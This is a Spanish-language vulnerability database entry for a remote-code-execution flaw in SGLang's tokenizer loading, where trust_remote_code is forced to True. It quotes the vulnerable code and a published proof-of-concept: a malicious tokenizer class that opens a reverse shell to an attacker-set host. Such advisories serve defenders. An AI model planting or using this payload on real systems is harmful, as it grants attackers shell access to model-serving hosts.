sgl-project SGLang hasta 0.5.9 HuggingFace Transformer hf_transformers_utils.py get_tokenizer trust_remote_code escalada de privilegios
| CVSS Puntuación meta temporal | Precio actual del exploit (≈) | Puntuación de interés CTI |
|---|---|---|
| 6.9 | $0-$5k | 0.00 |
Resumen
Una vulnerabilidad fue encontrada en sgl-project SGLang hasta 0.5.9 y clasificada como crítica. Resulta afectada una función desconocida dentro del archivo python/sglang/srt/utils/hf_transformers_utils.py dentro del componente HuggingFace Transformer Handler. Por la manipulación del parámetro trust_remote_code con el valor del input False como parte de Boolean se causa una vulnerabilidad de clase escalada de privilegios.
Esta vulnerabilidad se registra como CVE-2026-7669. El ataque se puede efectuar a través de la red. También se encuentra disponible un exploit.
Detalles
Una vulnerabilidad clasificada como crítica fue encontrada en sgl-project SGLang hasta 0.5.9 (Artificial Intelligence Software). La función get_tokenizer del archivo python/sglang/srt/utils/hf_transformers_utils.py del componente HuggingFace Transformer Handler es afectada por esta vulnerabilidad. Mediante la manipulación del parámetro trust_remote_code con el valor del input False se causa una vulnerabilidad de clase escalada de privilegios. Esto tiene repercusión sobre la confidencialidad, integridad y disponibilidad.
El error fue descubierto el 2026-04-07. La vulnerabilidad fue publicada el por Nicholas Gould, David Rochester (ngould y davidrochester) (no está definido). La vulnerabilidad es identificada como CVE-2026-7669. Resulta difícil de explotar. El ataque se puede hacer desde la red. La explotación no necesita ninguna autentificación específica. Los detalles técnicos asi como un exploit público son conocidos. El motivo de esta vulnerabilidad es esta parte del código:
# python/sglang/srt/utils/hf_transformers_utils.py:898-909
if not trust_remote_code and type(tokenizer).__name__ == "TokenizersBackend":
tokenizer = AutoTokenizer.from_pretrained(
tokenizer_name,
*args,
trust_remote_code=True,
tokenizer_revision=tokenizer_revision,
clean_up_tokenization_spaces=False,
**kwargs,
)Un exploit ha sido desarrollado por Nicholas Gould/David Rochester (gouldnicholas/davidrxchester) en Python. El exploit puede ser descargado de github.com. Fue declarado como prueba de concepto. Por lo menos durante 25 días, esta vulnerabilidad fue clasificada como exploit día cero. El código utilizado por el exploit es:
import os, pathlib
from transformers import PreTrainedTokenizerFast
class MaliciousTokenizer(PreTrainedTokenizerFast):
def __init__(self, *args, **kwargs):
pathlib.Path("/tmp/sglang_rce_marker").write_text("pwned")
host = os.environ.get("ATTACKER_HOST")
if host:
import socket
s = socket.socket()
s.connect((host, int(os.environ.get("ATTACKER_PORT", "4444"))))
os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2)
os.execve("/bin/sh", ["sh"], os.environ)
super().__init__(*args, **kwargs)No hay información respecto a posibles contramedidas. Se sugiere sustituir el producto con un equivalente.
La vulnerabilidad también está documentado en la base de datos EUVD (EUVD-2026-26802). Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Producto
Escribe
Proveedor
Nombre
Versión
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔒VulDB Confiabilidad: 🔍
CVSSv3
VulDB Puntuación meta base: 7.2VulDB Puntuación meta temporal: 6.9
VulDB Puntuación base: 5.6
VulDB Puntuación temporal: 5.1
VulDB Vector: 🔒
VulDB Confiabilidad: 🔍
Investigador Puntuación base: 8.8
Investigador Vector: 🔒
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complejidad | Autenticación | Confidencialidad | Integridad | Disponibilidad |
|---|---|---|---|---|---|
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
VulDB Puntuación base: 🔒
VulDB Puntuación temporal: 🔒
VulDB Confiabilidad: 🔍
Investigador Puntuación base: 🔒
Explotación
Clase: Escalada de privilegiosCWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔒
ATT&CK: 🔒
Físico: No
Local: No
Remoto: Sí
Disponibilidad: 🔒
Acceso: Público
Estado: Prueba de concepto
Autor: Nicholas Gould/David Rochester (gouldnicholas/davidrxchester)
Lenguaje de programación: 🔒
Descargar: 🔒
EPSS Score: 🔒
EPSS Percentile: 🔒
Predicción de precios: 🔍
Estimación del precio actual: 🔒
| 0-Day | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
|---|---|---|---|---|
| Hoy | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
Inteligencia de amenazas
Interés: 🔍Actores activos: 🔍
Grupos APT activos: 🔍
Contramedidas
Recomendación: no contramedida conocidaEstado: 🔍
Hora de 0 días: 🔒
Tiempo de retraso de explotación: 🔍
Línea de tiempo
2026-04-07 Vulnerabilidad encontrada2026-04-07 Fabricante informado
2026-05-02 Aviso publicado
2026-05-02 Entrada de VulDB creada
2026-05-03 Exploit publicado
2026-05-04 Última actualización de VulDB
Fuentes
Investigador: Nicholas Gould, David Rochester (ngould, davidrochester)Estado: No está definido
CVE: CVE-2026-7669 (🔒)
GCVE (CVE): GCVE-0-2026-7669
GCVE (VulDB): GCVE-100-360817
EUVD: 🔒
scip Labs: https://www.scip.ch/en/?labs.20161013
Artículo
Fecha de creación: 2026-05-02 10:05Actualizado: 2026-05-04 06:26
Cambios: 2026-05-02 10:05 (54), 2026-05-03 04:01 (1), 2026-05-04 06:23 (51), 2026-05-04 06:26 (8)
Completo: 🔍
Remitente: ngould
Committer: ngould
Cache ID: 216::103
Enviar
Aceptado
- Enviar #799263: sgl-project sglang <=0.5.9 Protection Mechanism Failure (por ngould)
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Sin comentarios aún. Idiomas: es + pt + en.
Por favor, inicie sesión para comentar.